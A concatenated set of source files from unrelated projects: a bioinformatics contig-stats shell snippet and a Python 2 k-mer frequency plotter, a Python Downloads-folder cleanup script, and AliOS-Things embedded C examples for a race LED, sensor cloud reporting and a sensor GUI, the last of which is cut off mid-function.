's/>NODE_([0-9]+)_length_([0-9]+)_cov_([0-9]+)/\1\t\2\t\3/'| cut -f 1 | tail -n 1) largest_contig=$( cat $contigs_file |grep ">" | sed -E 's/>NODE_([0-9]+)_length_([0-9]+)_cov_([0-9]+)/\1\t\2\t\3/'| cut -f 2 | head -n 1) #write contig stats to file echo " " >> mid1_6_cleaning_data.txt echo "Contig stats for $filename_out3 assembly" >> mid1_6_cleaning_data.txt echo "Total contigs: $num_contigs" >> mid1_6_cleaning_data.txt echo "Largest contig: $largest_contig" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt echo "#-------------------------------------------------------------------------------#" >> mid1_6_cleaning_data.txt assembly_data="_Asm_Data.tsv" echo "Contig_num Contig_len Contig_cov" > $filename$adapter_trim$trim_edge$vector_trim$quality_clip$assembly_data echo "$contig_stats" >> $filename$adapter_trim$trim_edge$vector_trim$quality_clip$assembly_data echo "done with $file.sff" done <file_sep>#!/usr/bin/python import sys import getopt import matplotlib import numpy as np matplotlib.use("Agg") # Force matplotlib to not use Xwindows backend. import matplotlib.pyplot as plt kmer = 11 file_name = "" xmax = 2000 argv = sys.argv[1:] try: opts, args = getopt.getopt(argv, "hk:x:f:") except getopt.GetoptError: print 'kmer.py -k <kmer_size> -x <x_axis_max> -f <inputfile>' sys.exit(2) for opt, arg in opts: if opt == '-h': print "K-mer frequnecy graphing script \n" print "Usage: \n" print 'kmer.py -k <kmer_size> -x <x_axis_max> -f <inputfile> \n\n' print "Goals: print "1) Take in fastq file and kmerize it and output kmer occurence frequnecy\n" print "2) Output graph of kmer occurence frequnecy\n" print "3) Output kmer occurence frequnecy to .tsv file\n" print "\n" sys.exit() elif opt in ("-k"): kmer = arg elif opt in ("-x"): xmax = arg elif opt in ("-f"): file_name = arg print "Kmer size is:", kmer print "X-axis max kmer count is:", xmax print "Input file is:", file_name print " " ############################################################################### # Progress bar is not my own work from: # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3 # def progress(count, total, suffix=''): bar_len = 60 filled_len = int(round(bar_len * count / float(total))) percents = round(100.0 * count / float(total), 1) bar = '=' * filled_len + '-' * (bar_len - filled_len) sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix)) sys.stdout.flush() ################################################## # Dictionary storing kmers kmer_dic = {} # importing file in_file = file_name fh1 = open(in_file, 'r') # Count number of lines in a file num_lines = sum(1 for line in fh1) fh1.close if num_lines >= 100000: print "Your file has %s number of lines..." % (num_lines) print "This may take a while to process..." print "...so be patience..." print " " fh2 = open(in_file, 'r') # skip first line next(fh2) count = 0 print "K-merizing the reads..." for line in fh2: progress(count, num_lines, suffix='done') count = count + 1 if count % 4 == 1: line.strip('\n') line_length = len(line) # Starting kmer parsing 0 to length of line minus kmer size for kmer_start_index in range(0, (int(line_length) - int(kmer))): # range for kmer kmer_end_index = kmer_start_index + int(kmer) # collect khmer for this iteraton kmer_string = line[kmer_start_index: kmer_end_index] # check for kmer in dictionary and ++ if not present add to dic and equal 1 kmer_dic[kmer_string] = kmer_dic.get(kmer_string, 0) + 1 # khmer freq dictionary kmer_dic_freq = {} # count the number of count of kmers for val in kmer_dic.values(): kmer_dic_freq[val] = kmer_dic_freq.get(val, 0) + 1 print " " print "#-----------------------------------------------------------------------#" list_of_kmer_occurences = [] list_of_kmer_occurences.append([]) list_of_kmer_occurences.append([]) # Print out list of counts of count of K-mers print "K-mer Frequency Number of K-mers in this category" for key in sorted(kmer_dic_freq.keys()): print key, " ", kmer_dic_freq[key] list_of_kmer_occurences[0].append(key) list_of_kmer_occurences[1].append(kmer_dic_freq[key]) print " " print "#-----------------------------------------------------------------------#" # Open file for writing file_out = "./%s_kmer_freq_data_Ksize_%s.tsv" % (file_name[:-6], kmer) fh_out = open(file_out, 'w') fh_out.write("K-mer Frequency\tNumber of K-mers in this category\n") for key in sorted(kmer_dic_freq.keys()): fh_out.write("%s\t%s\n" % (key, kmer_dic_freq[key])) fh_out.close # Ploting print "Graphing Kmers..." plt.bar(kmer_dic_freq.keys(), kmer_dic_freq.values(), edgecolor="none", width=1.0, log=True) plt.xlim(0, int(xmax)) plt.xlabel('Number of K-mers') plt.ylabel('Number of Appearances') plt.title('Counts of the number of Kmer Occurences') plt.annotate('K-mer size = %s' % (kmer), xy=(1, 3), xytext=((int(xmax)- 489), 21)) plt.grid(True) print "\nPrinting %s_kmer_freq_hist_Ksize_%s.png" % (file_name[:-6], kmer) # Save first graph plt.savefig("%s_kmer_freq_hist_Ksize_%s.png" % (file_name[:-6], kmer)) plt.close()
b6c4c5cd8638ec41b3e3e120d918100e651499de
[ "Markdown", "Python", "Shell" ]
3
Markdown
mattgrobelny/454_data_analysis
e3de1e6e35aa413c3120b44ee58679fc74edc5de
028cd7af6d69156129e1f80e9f063282b7f4cc2f
refs/heads/main
<file_sep># ライブラリのインポート import os import datetime import shutil # 変数設定 today = datetime.date.today() trashcan = today.strftime('%Y%m%d') delete_kouho = "削除候補フォルダ" downloadpath = os.getenv("HOMEDRIVE") + os.getenv("HOMEPATH") + "\Downloads" delete_kouho_path = downloadpath + "\削除候補フォルダ" # 関数部 #Transporter 使用されなかったファイル削除候補フォルダにを移動する def transporter(): os.chdir(downloadpath) os.mkdir(trashcan) move_list = [] if not os.path.exists(delete_kouho): os.mkdir(delete_kouho) print('ダウンロードフォルダの中に「削除候補フォルダ」を作成しました') # ファイル更新日から60日以上経過しているファイルを移動 contents = os.listdir(downloadpath) for file in contents: if os.path.isfile(file): timestamp = datetime.date.fromtimestamp(os.path.getmtime(file)) diff = today - timestamp if diff.days > 60: move_list.append(file) shutil.move(file, trashcan) if len(move_list) == 0: shutil.rmtree(trashcan) print('削除候補に移動されたファイルはありませんでした') elif len(move_list) >= 10: shutil.move(trashcan, delete_kouho) print('多数のファイルが削除候補に移動されました') print('削除候補の中のフォルダは30日間で削除されます') else: for file in move_list: print(file) shutil.move(trashcan, delete_kouho) print('上記のファイルが削除候補に移動されました') print('削除候補の中のフォルダは30日間で削除されます') #deleter transporter関数で作られた削除候補フォルダの内、30日以上使用されなかったものを移動する def deleter(): delete_list = [] os.chdir(delete_kouho_path) contents = os.listdir(delete_kouho_path) for dir in contents: timestamp = datetime.date.fromtimestamp(os.path.getmtime(dir)) diff = today - timestamp if diff.days > 30: delete_list.append(dir) shutil.rmtree(dir) if len(delete_list) == 0: print('削除したフォルダはありませんでした') else: for dir in delete_list: print(dir) print('上記のフォルダを削除しました') #処理部 transporter() deleter() input()
cc4f11641e5cb64b58a40019019bdfa2aef82952
[ "Python" ]
1
Python
Sabe0308/dircleaner
5fc9ce1165002d0c028460df11213d3be8d72d3b
a7e2b980327f74a83ca799c6175cda249327d029
refs/heads/master
<repo_name>lihaijun7781/Alithings-3.0.0<file_sep>/app/example/raceled/aos.mk NAME := raceled $(NAME)_MBINS_TYPE := app $(NAME)_VERSION := 1.0.0 $(NAME)_SUMMARY := raceled $(NAME)_SOURCES := raceled.c $(NAME)_COMPONENTS += osal_aos GLOBAL_DEFINES += AOS_NO_WIFI $(NAME)_INCLUDES += ./ <file_sep>/app/example/udata_demo/sensor_cloud_demo/sensor_cloud_demo.c /* * Copyright (C) 2015-2019 Alibaba Group Holding Limited */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include "aos/cli.h" #include "aos/kernel.h" #include "sensor/sensor.h" #include "aos/yloop.h" #include "ulog/ulog.h" #include "netmgr.h" #include "linkkit/infra/infra_compat.h" #include "linkkit/infra/infra_defs.h" #include "linkkit/dev_model_api.h" #include "app_entry.h" #define SENSOR_SAMPLE_TIME 1000 /* sensor sampling period is 1000 ms*/ #define PROP_POST_FORMAT_TEMP "{\"CurrentTemperature\":%.1f}" #define PROP_POST_FORMAT_HUMI "{\"CurrentHumidity\":%.1f}" #define PROP_POST_FORMAT_ACC "{\"Accelerometer\":{\"x\":%.2f, \"y\":%.2f, \"z\":%.2f}}" static volatile char g_wifi_connect = 0; /* wifi connect flag */ #ifdef AOS_COMP_CLI static void print_devinfo() { char _product_key[IOTX_PRODUCT_KEY_LEN + 1] = {0}; char _device_name[IOTX_DEVICE_NAME_LEN + 1] = {0}; #ifdef DEMO_DEBUG char _product_secret[IOTX_PRODUCT_SECRET_LEN + 1] = {0}; char _device_secret[IOTX_DEVICE_SECRET_LEN + 1] = {0}; #endif HAL_GetProductKey(_product_key); HAL_GetDeviceName(_device_name); LOG("pk:%s", _product_key); LOG("dn:%s", _device_name); #ifdef DEMO_DEBUG HAL_GetProductSecret(_product_secret); HAL_GetDeviceSecret(_device_secret); LOG("ps:%s", _product_secret); LOG("ds:%s", _device_secret); #endif } static void set_devinfo(char *pk, char *ps, char *dn, char *ds) { if (dn != NULL) { HAL_SetDeviceName(dn); } if (ds != NULL) { HAL_SetDeviceSecret(ds); } if (pk != NULL) { HAL_SetProductKey(pk); } if (ps != NULL) { HAL_SetProductSecret(ps); } } static void handle_devinfo_cmd(char *pwbuf, int blen, int argc, char **argv) { const char *rtype = argc > 1 ? argv[1] : ""; if (strcmp(rtype, "get") == 0) { print_devinfo(); } else if (strcmp(rtype, "set") == 0) { if (argc == 4) { set_devinfo(NULL, NULL, argv[2], argv[3]); } else if (argc == 5) { set_devinfo(argv[2], argv[3], argv[4], ""); } else if (argc == 6) { set_devinfo(argv[2], argv[3], argv[4], argv[5]); } else { LOG("arg number err! usage:"); LOG("devinfo set {pk} {ps} {dn} [ds] | devinfo set {dn} {ds}"); } } else if (strcmp(rtype, "clean") == 0) { set_devinfo("", "", "", ""); } else { LOG("usage:"); LOG("devinfo [set pk ps dn ds | set dn ds | get | clean]"); } } static struct cli_command devinfo_cmd = { .name = "devinfo", .help = "devinfo [set pk ps dn ds | set dn ds | get | clean ]", .function = handle_devinfo_cmd }; #endif /* linkkit initialize callback */ static int user_initialized(const int devid) { user_example_ctx_t *user_example_ctx = user_example_get_ctx(); LOG("Device Initialized, Devid: %d", devid); /* Set the linkkit initialize success flag */ if (user_example_ctx->master_devid == devid) { user_example_ctx->master_initialized = 1; } return 0; } /* wifi connect success callback */ static void wifi_service_event(input_event_t *event, void *priv_data) { netmgr_ap_config_t config; if (event->type != EV_WIFI) { return; } if (event->code != CODE_WIFI_ON_GOT_IP) { return; } memset(&config, 0, sizeof(netmgr_ap_config_t)); netmgr_get_ap_config(&config); LOG("wifi_service_event config.ssid %s", config.ssid); if (strcmp(config.ssid, "adha") == 0 || strcmp(config.ssid, "aha") == 0) { return; } #ifdef EN_COMBO_NET if (awss_running) { awss_success_notify(); } #endif /* Set wifi connect flag */ if (g_wifi_connect == 0) { g_wifi_connect = 1; } } /* sensor cloud test, include the following functions */ /* 1. wait wifi conect */ /* 2. link aliyun server */ /* 3. sensor start */ /* 4. handle linkkit event */ void sensor_cloud_test(void *arg) { int ret = 0; char param[128]; temperature_data_t temp; accel_data_t acc; iotx_linkkit_dev_meta_info_t master_meta_info; user_example_ctx_t *user_ctx = user_example_get_ctx(); (void)arg; /* Wait the wifi connect flag to set */ while(g_wifi_connect == 0){ static int cnt = 0; static int retry = 0; aos_msleep(100); if (cnt++ == 80) { printf("Connect AP failed , retry ....\n\n"); netmgr_start(true); if (retry++ < 5) { cnt = 0; } } if (cnt > 200) cnt = 0; } /* Linkkit start */ ret = linkkit_init(); if (ret != 0){ return; } /* Register linkkit initialize callback */ IOT_RegisterCallback(ITE_INITIALIZE_COMPLETED, user_initialized); memset(&master_meta_info, 0, sizeof(iotx_linkkit_dev_meta_info_t)); #if 0 memcpy(master_meta_info.product_key, PRODUCT_KEY, strlen(PRODUCT_KEY)); memcpy(master_meta_info.product_secret, PRODUCT_SECRET, strlen(PRODUCT_SECRET)); memcpy(master_meta_info.device_name, DEVICE_NAME, strlen(DEVICE_NAME)); memcpy(master_meta_info.device_secret, DEVICE_SECRET, strlen(DEVICE_SECRET)); #else HAL_GetProductKey(master_meta_info.product_key); HAL_GetDeviceName(master_meta_info.device_name); HAL_GetDeviceSecret(master_meta_info.device_secret); #endif /* Create a new device */ user_ctx->master_devid = IOT_Linkkit_Open(IOTX_LINKKIT_DEV_TYPE_MASTER, &master_meta_info); if (user_ctx->master_devid < 0) { printf("IOT_Linkkit_Open Failed\n"); return; } /* Start Connect Aliyun Server */ ret = IOT_Linkkit_Connect(user_ctx->master_devid); if (ret < 0) { printf("IOT_Linkkit_Connect Failed\n"); return; } /* Sensor Hal start */ ret = sensor_hal_init(); if (ret != 0) { return; } #if 0 /* Open the acceleration sensor device */ ret = sensor_hal_open(TAG_DEV_ACC, 0); if (ret != 0) { return; } #endif /* Open the temperature sensor device */ ret = sensor_hal_open(TAG_DEV_TEMP, 0); if (ret != 0) { return; } /* Set the sampling period for sensors */ // (void)sensor_hal_ioctl(TAG_DEV_ACC, 0, SENSOR_IOCTL_ODR_SET, SENSOR_SAMPLE_TIME); (void)sensor_hal_ioctl(TAG_DEV_TEMP, 0, SENSOR_IOCTL_ODR_SET, SENSOR_SAMPLE_TIME); /* Enter loop run to handle linkkit event */ while (1) { #if 0 /* Read the acceleration sensor data */ ret = sensor_hal_read(TAG_DEV_ACC, 0, &acc, sizeof(acc)); if (ret > 0) { /* Print the acceleration sensor data */ printf("\nAcceleration value: x-axis(%.3f g) y-axis(%.3f g) z-axis(%.3f g) \n", ((float)acc.data[0])/1000 , ((float)acc.data[1])/1000, ((float)acc.data[2])/1000); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_ACC, ((float)acc.data[0])/1000 , ((float)acc.data[1])/1000, ((float)acc.data[2])/1000); /* Report the acceleration data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } #endif /* Read the temperature sensor data */ ret = sensor_hal_read(TAG_DEV_TEMP, 0, &temp, sizeof(temp)); if (ret > 0) { /* Print the temperature sensor data */ printf("\nTemperature value : %.1f centidegree\n", ((float)temp.t)/10); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_TEMP, ((float)(temp.t))/10); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } ret = sensor_hal_read(TAG_DEV_HUMI, 0, &temp, sizeof(temp)); if (ret > 0) { /* Print the temperature sensor data */ printf("\nHumi value : %.1f \n", ((float)temp.t)/10); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_HUMI, ((float)(temp.t))/10); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } IOT_Linkkit_Yield(2000); } } int application_start(int argc, char **argv) { int ret; #ifdef WITH_SAL sal_add_dev(NULL, NULL); /* Sal initialize if needed */ sal_init(); #endif #ifdef AOS_COMP_CLI aos_cli_register_command(&devinfo_cmd); #endif /* Set debug log show */ aos_set_log_level(AOS_LL_DEBUG); /* Wifi initialize */ /* User can use the following cli commands to connect wifi */ /* Clear wifi command: netmgr clear */ /* Connect wifi command: netmgr connect ssid passwd */ netmgr_init(); /* Register wifi connect callback */ aos_register_event_filter(EV_WIFI, wifi_service_event, NULL); /* Creat task for sensor cloud test */ ret = aos_task_new("sensor_cloud_test", sensor_cloud_test, NULL, 8192); if (ret != 0) { return -1; } /* Connect wifi with old ssid and passwd */ netmgr_start(true); /* Enter yloop */ aos_loop_run(); return 0; } <file_sep>/app/example/sensor_gui/aos.mk NAME := sensor_gui $(NAME)_MBINS_TYPE := app $(NAME)_VERSION := 1.0.1 $(NAME)_SUMMARY := Everylinked sensor GUI example $(NAME)_SOURCES := developerkitgui.c sensor_display.c freetype_display.c AliOS_Things_logo.c $(NAME)_COMPONENTS := yloop cli freetype253 fatfs sensor linkkit_sdk_c netmgr cjson ENABLE_IRDA_HAL := 1 ENABLE_CAMERA_HAL := 1 $(NAME)_INCLUDES += . $(NAME)_COMPONENTS += littlevGL $(NAME)_SOURCES += sensor_cloud_demo.c $(NAME)_SOURCES += linkkit/linkkit_example_solo.c $(NAME)_INCLUDES += ./ ./linkkit GLOBAL_DEFINES += LITTLEVGL_DEVELOPERKIT CONFIG_AOS_FATFS_SUPPORT_MMC <file_sep>/drivers/sal/wifi/esp8266_12F/aos.mk NAME := device_sal_esp8266_12F $(NAME)_MBINS_TYPE := kernel $(NAME)_VERSION := 1.0.1 $(NAME)_SUMMARY := sal hal implementation for esp8266_12F $(NAME)_SOURCES += wifi_atcmd.c GLOBAL_DEFINES += DEV_SAL_ESP8266_12F $(NAME)_COMPONENTS += yloop ifneq (1, $(at_adapter)) $(NAME)_COMPONENTS += atparser $(NAME)_SOURCES += esp8266_12F.c endif $(NAME)_INCLUDES += ./ <file_sep>/app/example/raceled/README.md # raceled sample ## Contents ```sh raceled ├── raceled.c # raceled source code ├── Config.in # kconfig file ├── raceled.mk # aos build system file └── k_app_config.h # aos app config file ``` ## Introduction The **raceled** example shows how to drive LEDs and use of GPIO input with interrupts on the [supported boards](../../../board) in AliOS-Things, the example will work like this: * RGB led loop every 1s. * push button will turn raceled on/off. ### Requirements in `raceled.c` need to redefine the following macro: * `GPIO_RED `(LED red) * `GPIO_BLUE`(LED blue) * `GPIO_GREEN`(LED green) ### Features * RGB LED run one loop every 1s. * push button will turn raceled on/off. ### Dependencies * yloop * cli ### Supported Boards - all ### Build ```sh # generate raceled@everylinked default config aos make raceled@everylinked -c config # or customize config manually aos make menuconfig # build aos make ``` > if you want to see AliOS-Things supports boards, click [board](../../../board). ### Install ```sh aos upload raceled@yourboard ``` > if you are not sure is the`aos upload` command supports your board, check [aos upload](../../../build/site_scons/upload). ### Reference * https://yq.aliyun.com/articles/669088 ### support for st nucleo board * verified on stm32l476rg everylink board, other nucleo also can be supported, please refer to the hardware guide for the gpio pin number <file_sep>/app/example/raceled/raceled.c /* * Copyright (C) 2015-2017 Alibaba Group Holding Limited */ #include <stdio.h> #include "aos/kernel.h" #include "ulog/ulog.h" #include "aos/hal/gpio.h" #define GPIO_LED_IO 45 #define GPIO_TRIGGER_IO 11 #define GPIO_INPUT_IO 41 #define GPIO_RED 45 #define GPIO_BLUE 43 #define GPIO_GREEN 42 static void app_trigger_low_action(void *arg); static void app_trigger_high_action(void *arg); gpio_dev_t led; gpio_dev_t trigger; gpio_dev_t input; //add for st nucleo board gpio_dev_t led_red; gpio_dev_t led_green; gpio_dev_t led_blue; static void gpio_isr_handler(void* arg) { uint32_t gpio_num = (uint32_t) arg; uint32_t value = 0; hal_gpio_input_get(&input, &value); hal_gpio_output_toggle(&led); LOG("GPIO[%u] intr, val: %u\n", gpio_num, value); } static void app_trigger_low_action(void *arg) { hal_gpio_output_low(&trigger); aos_post_delayed_action(1000, app_trigger_high_action, NULL); } static void app_trigger_high_action(void *arg) { hal_gpio_output_high(&trigger); aos_post_delayed_action(1000, app_trigger_low_action, NULL); } int application_start(int argc, char *argv[]) { #ifdef STM32L496xx // developerkit /* gpio port config */ led.port = GPIO_LED_IO; /* set as output mode */ led.config = OUTPUT_PUSH_PULL; /* configure GPIO with the given settings */ hal_gpio_init(&led); /* gpio port config */ trigger.port = GPIO_TRIGGER_IO; /* set as output mode */ trigger.config = OUTPUT_PUSH_PULL; /* configure GPIO with the given settings */ hal_gpio_init(&trigger); /* input pin config */ input.port = GPIO_INPUT_IO; /* set as interrupt mode */ input.config = IRQ_MODE; /* configure GPIO with the given settings */ hal_gpio_init(&input); /* gpio interrupt config */ hal_gpio_enable_irq(&input, IRQ_TRIGGER_BOTH_EDGES, gpio_isr_handler, (void *) GPIO_INPUT_IO); aos_post_delayed_action(1000, app_trigger_low_action, NULL); #else led_red.port = GPIO_RED; /* set as output mode */ led_red.config = OUTPUT_PUSH_PULL; hal_gpio_init(&led_red); led_blue.port = GPIO_BLUE; /* set as output mode */ led_blue.config = OUTPUT_PUSH_PULL; hal_gpio_init(&led_blue); led_green.port = GPIO_GREEN; /* set as output mode */ led_green.config = OUTPUT_PUSH_PULL; /* configure GPIO with the given settings */ hal_gpio_init(&led_green); int cnt = 0; while (1) { /* Insert delay 1000 ms */ printf(" race led loop %d \n",cnt++); aos_msleep(333); hal_gpio_output_toggle(&led_green); aos_msleep(333); hal_gpio_output_toggle(&led_blue); aos_msleep(333); hal_gpio_output_toggle(&led_red); } #endif aos_loop_run(); return 0; } <file_sep>/app/example/sensor_gui/developerkitgui.c /* * Copyright (C) 2015-2017 Alibaba Group Holding Limited */ #include <k_api.h> #include "lvgl.h" #include "aos/kernel.h" #include "soc_init.h" #include "sensor_display.h" #include "freetype_display.h" #include "netmgr.h" #include "aos/yloop.h" #include "ulog/ulog.h" #define FREETYPE_DISPLAY 0 extern volatile char g_wifi_connect; static void gui_init(void); static void littlevgl_refresh_task(void *arg); static void lvgl_disp_drv_init(void); static void my_disp_flush(lv_disp_drv_t * disp_drv, const lv_area_t * area, lv_color_t * color_p); extern int freetype_init(void); extern void sensor_cloud_test(void *arg); /* wifi connect success callback */ static void wifi_service_event(input_event_t *event, void *priv_data) { netmgr_ap_config_t config; if (event->type != EV_WIFI) { return; } if (event->code != CODE_WIFI_ON_GOT_IP) { return; } memset(&config, 0, sizeof(netmgr_ap_config_t)); netmgr_get_ap_config(&config); LOG("wifi_service_event config.ssid %s", config.ssid); if (strcmp(config.ssid, "adha") == 0 || strcmp(config.ssid, "aha") == 0) { return; } #ifdef EN_COMBO_NET if (awss_running) { awss_success_notify(); } #endif /* Set wifi connect flag */ if (g_wifi_connect == 0) { g_wifi_connect = 1; } } /* display driver */ lv_disp_drv_t disp_drv; int application_start(int argc, char *argv[]) { #ifdef WITH_SAL sal_add_dev(NULL, NULL); /* Sal initialize if needed */ sal_init(); #endif printf("application_start\n"); netmgr_init(); netmgr_start(false); aos_register_event_filter(EV_WIFI, wifi_service_event, NULL); int ret =aos_task_new("sensor_cloud_test", sensor_cloud_test, NULL, 8192); gui_init(); aos_loop_run(); return 0; } void gui_init(void) { /* init littlevGL */ lv_init(); #if FREETYPE_DISPLAY == 1 freetype_init(); #endif /* init LCD */ st7789_init(); /* register driver for littlevGL */ lvgl_disp_drv_init(); /* Register wifi connect callback */ /* create a task to refresh the LCD */ int ret = aos_task_new("littlevgl_refresh_task", littlevgl_refresh_task, NULL, 4096); /* start app */ #if FREETYPE_DISPLAY == 0 sensor_display(); #else freetype_display(); #endif } static void littlevgl_refresh_task(void *arg) { while (1) { static int cnt = 0; // if (cnt++ % 100 == 0) // printf("littlevgl_refresh_task !\n"); /* this function is used to refresh the LCD */ lv_task_handler(); krhino_task_sleep(RHINO_CONFIG_TICKS_PER_SECOND / 10); } } void lvgl_disp_drv_init(void) { static lv_disp_buf_t disp_buf_2; static lv_color_t buf2_1[LV_HOR_RES_MAX * 10]; /*A buffer for 10 rows*/ static lv_color_t buf2_2[LV_HOR_RES_MAX * 10]; /*An other buffer for 10 rows*/ lv_disp_buf_init(&disp_buf_2, buf2_1, buf2_2, LV_HOR_RES_MAX * 10); /*Initialize the display buffer*/ /*----------------------------------- * Register the display in LittlevGL *----------------------------------*/ lv_disp_drv_init(&disp_drv); /*Basic initialization*/ /*Set up the functions to access to your display*/ /*Set the resolution of the display*/ disp_drv.hor_res = 240; disp_drv.ver_res = 240; /*Used to copy the buffer's content to the display*/ disp_drv.flush_cb = my_disp_flush; /*Set a display buffer*/ disp_drv.buffer = &disp_buf_2; /*Finally register the driver*/ lv_disp_drv_register(&disp_drv); } void my_disp_flush(lv_disp_drv_t * disp_drv, const lv_area_t * area, lv_color_t * color_p) { int32_t x = 0; int32_t y = 0; for (y = area->y1; y <= area->y2; y++) { ST7789H2_WriteLine(area->x1, y, (uint8_t *)color_p, (area->x2 - area->x1 + 1)); color_p += (area->x2 - area->x1 + 1); } lv_disp_flush_ready(&disp_drv); } <file_sep>/app/example/sensor_gui/sensor_cloud_demo.c /* * Copyright (C) 2015-2019 Alibaba Group Holding Limited */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include "aos/cli.h" #include "aos/kernel.h" #include "sensor/sensor.h" #include "aos/yloop.h" #include "ulog/ulog.h" #include "netmgr.h" #include "linkkit/infra/infra_compat.h" #include "linkkit/infra/infra_defs.h" #include "linkkit/dev_model_api.h" #include "app_entry.h" #include "linkkit/infra/infra_cjson.h" #include "soc_init.h" #define SENSOR_SAMPLE_TIME 1000 /* sensor sampling period is 1000 ms*/ #define PROP_POST_FORMAT_TEMP "{\"CurrentTemperature\":%.1f}" #define PROP_POST_FORMAT_HUMI "{\"CurrentHumidity\":%.1f}" #define PROP_POST_FORMAT_ALARMSTATUS "{\"AlarmState\":%d}" #define PROP_POST_FORMAT_ACC "{\"Accelerometer\":{\"x\":%.2f, \"y\":%.2f, \"z\":%.2f}}" volatile char g_wifi_connect = 0; /* wifi connect flag */ extern float alarm_setting; extern bool alarm_clear ; #ifdef AOS_COMP_CLI static void print_devinfo() { char _product_key[IOTX_PRODUCT_KEY_LEN + 1] = {0}; char _device_name[IOTX_DEVICE_NAME_LEN + 1] = {0}; #ifdef DEMO_DEBUG char _product_secret[IOTX_PRODUCT_SECRET_LEN + 1] = {0}; char _device_secret[IOTX_DEVICE_SECRET_LEN + 1] = {0}; #endif HAL_GetProductKey(_product_key); HAL_GetDeviceName(_device_name); LOG("pk:%s", _product_key); LOG("dn:%s", _device_name); #ifdef DEMO_DEBUG HAL_GetProductSecret(_product_secret); HAL_GetDeviceSecret(_device_secret); LOG("ps:%s", _product_secret); LOG("ds:%s", _device_secret); #endif } static void set_devinfo(char *pk, char *ps, char *dn, char *ds) { if (dn != NULL) { HAL_SetDeviceName(dn); } if (ds != NULL) { HAL_SetDeviceSecret(ds); } if (pk != NULL) { HAL_SetProductKey(pk); } if (ps != NULL) { HAL_SetProductSecret(ps); } } static void handle_devinfo_cmd(char *pwbuf, int blen, int argc, char **argv) { const char *rtype = argc > 1 ? argv[1] : ""; if (strcmp(rtype, "get") == 0) { print_devinfo(); } else if (strcmp(rtype, "set") == 0) { if (argc == 4) { set_devinfo(NULL, NULL, argv[2], argv[3]); } else if (argc == 5) { set_devinfo(argv[2], argv[3], argv[4], ""); } else if (argc == 6) { set_devinfo(argv[2], argv[3], argv[4], argv[5]); } else { LOG("arg number err! usage:"); LOG("devinfo set {pk} {ps} {dn} [ds] | devinfo set {dn} {ds}"); } } else if (strcmp(rtype, "clean") == 0) { set_devinfo("", "", "", ""); } else { LOG("usage:"); LOG("devinfo [set pk ps dn ds | set dn ds | get | clean]"); } } static struct cli_command devinfo_cmd = { .name = "devinfo", .help = "devinfo [set pk ps dn ds | set dn ds | get | clean ]", .function = handle_devinfo_cmd }; #endif /* linkkit initialize callback */ static int user_initialized(const int devid) { user_example_ctx_t *user_example_ctx = user_example_get_ctx(); LOG("Device Initialized, Devid: %d", devid); /* Set the linkkit initialize success flag */ if (user_example_ctx->master_devid == devid) { user_example_ctx->master_initialized = 1; } return 0; } #define MESSAGE_ALARM_FLAG_ID "alarm_off" #define MESSAGE_ALARM_SETTING_ID "alarm_setting" static aos_mutex_t mutex_message_callback; void usr_message_arrive2(const int fd, const unsigned char * message, const int len) { char alarm_flag; char *payload = message; LOG("Message Arrived: %s",message); if (aos_mutex_lock(&mutex_message_callback, AOS_WAIT_FOREVER)) return; int res = 0; lite_cjson_t lite, lite_item_id, lite_item_code, lite_item_devid; if (payload == NULL) { aos_mutex_unlock(&mutex_message_callback); return; } /* Parse JSON */ res = lite_cjson_parse(payload, strlen(payload), &lite); if (res != SUCCESS_RETURN || !lite_cjson_is_object(&lite)) { aos_mutex_unlock(&mutex_message_callback); return; } /* Parse Message ID */ res = lite_cjson_object_item(&lite, MESSAGE_ALARM_FLAG_ID, strlen(MESSAGE_ALARM_FLAG_ID), &lite_item_id); if (res != SUCCESS_RETURN || !lite_cjson_is_number(&lite_item_id)) { //return; } else { alarm_clear = lite_item_id.value_int; LOG("lite_item_id.value_int : %d ,alarm_clear : %d", lite_item_id.value_int,alarm_clear); } res = lite_cjson_parse(payload, strlen(payload), &lite); if (res != SUCCESS_RETURN || !lite_cjson_is_object(&lite)) { //return; } res = lite_cjson_object_item(&lite, MESSAGE_ALARM_SETTING_ID, strlen(MESSAGE_ALARM_SETTING_ID), &lite_item_id); if (res != SUCCESS_RETURN || !lite_cjson_is_number(&lite_item_id)) { //return; } else { char buffer[128]={0}; alarm_setting = (float)lite_item_id.value_int; sprintf(buffer,"%f",alarm_setting); if (alarm_setting > 20 && alarm_setting < 60) kv_item_set(MESSAGE_ALARM_SETTING_ID, buffer, strlen(buffer)); LOG("lite_item_id.value_int %d ,alarm_setting : %f", lite_item_id.value_int,alarm_setting); } aos_mutex_unlock(&mutex_message_callback); } extern float g_temp; extern float g_humi; /* sensor cloud test, include the following functions */ /* 1. wait wifi conect */ /* 2. link aliyun server */ /* 3. sensor start */ /* 4. handle linkkit event */ void sensor_cloud_test(void *arg) { int ret = 0; static char param[128]; iotx_linkkit_dev_meta_info_t master_meta_info; user_example_ctx_t *user_ctx = user_example_get_ctx(); #ifdef AOS_COMP_CLI aos_cli_register_command(&devinfo_cmd); #endif (void)arg; aos_mutex_new(&mutex_message_callback); /* Wait the wifi connect flag to set */ while (g_wifi_connect == 0) { static int cnt = 0; static int retry = 0; aos_msleep(100); if (cnt++ == 80) { printf("Connect AP failed , retry ....\n\n"); netmgr_start(true); if (retry++ < 5) { cnt = 0; } } if 